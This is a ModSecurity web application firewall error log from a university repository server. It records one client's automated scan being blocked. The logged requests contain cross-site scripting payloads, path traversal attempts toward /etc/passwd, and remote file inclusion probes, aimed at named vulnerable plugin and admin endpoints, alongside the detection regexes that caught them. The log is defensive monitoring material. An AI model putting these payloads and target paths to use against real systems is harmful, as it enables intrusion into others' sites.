[Tue Aug 29 11:51:14.675895 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAlUlhkAAAA0"]
[Tue Aug 29 11:51:15.625499 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAkyyD8AAAAW"]
[Tue Aug 29 11:51:15.663116 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAm@5wkAAAAH"]
[Tue Aug 29 11:51:15.727240 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAjdQTYAAAAZ"]
[Tue Aug 29 11:51:16.552893 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAkr0EgAAAAC"]
[Tue Aug 29 11:51:16.587926 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAlUliAAAAA0"]
[Tue Aug 29 11:51:17.599538 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAjdQT0AAAAZ"]
[Tue Aug 29 11:51:17.629202 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnCKy8AAAAK"]
[Tue Aug 29 11:51:20.563060 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmQ-woAAAAb"]
[Tue Aug 29 11:51:20.702662 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmNp34AAAAQ"]
[Tue Aug 29 11:51:21.538799 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAm-McwAAAAI"]
[Tue Aug 29 11:51:21.628408 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm-Mc0AAAAI"]
[Tue Aug 29 11:51:21.715123 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAnIlgEAAAAV"]
[Tue Aug 29 11:51:22.924353 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAlUliUAAAA0"]
[Tue Aug 29 11:51:22.924568 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAkr0FUAAAAC"]
[Tue Aug 29 11:51:22.968059 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15SsCo-f0AAAm@5xsAAAAH"]
[Tue Aug 29 11:51:23.558450 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAkr0FYAAAAC"]
[Tue Aug 29 11:51:23.756913 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAnDFyYAAAAM"]
[Tue Aug 29 11:51:24.759208 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15TMCo-f0AAAnDFygAAAAM"]
[Tue Aug 29 11:51:24.965061 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php"] [unique_id "ZO15TMCo-f0AAAlUlikAAAA0"]
[Tue Aug 29 11:51:26.788395 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15TsCo-f0AAAm@5yEAAAAH"]
[Tue Aug 29 11:51:26.835601 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAmIbQcAAAAo"]
[Tue Aug 29 11:51:26.888247 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAmNp40AAAAQ"]
[Tue Aug 29 11:51:27.028717 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAm@5yMAAAAH"]
[Tue Aug 29 11:51:27.598945 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm7m@0AAAAE"]
[Tue Aug 29 11:51:28.820250 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAkr0GcAAAAC"]
[Tue Aug 29 11:51:28.867351 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAlIBioAAAAn"]
[Tue Aug 29 11:51:28.944190 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAmLPTgAAAAN"]
[Tue Aug 29 11:51:29.557483 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:username: '\\x22><script>javascript:alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/timesheet/login.php"] [unique_id "ZO15UcCo-f0AAAkyyF8AAAAW"]
[Tue Aug 29 11:51:30.620418 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm7m-cAAAAE"]
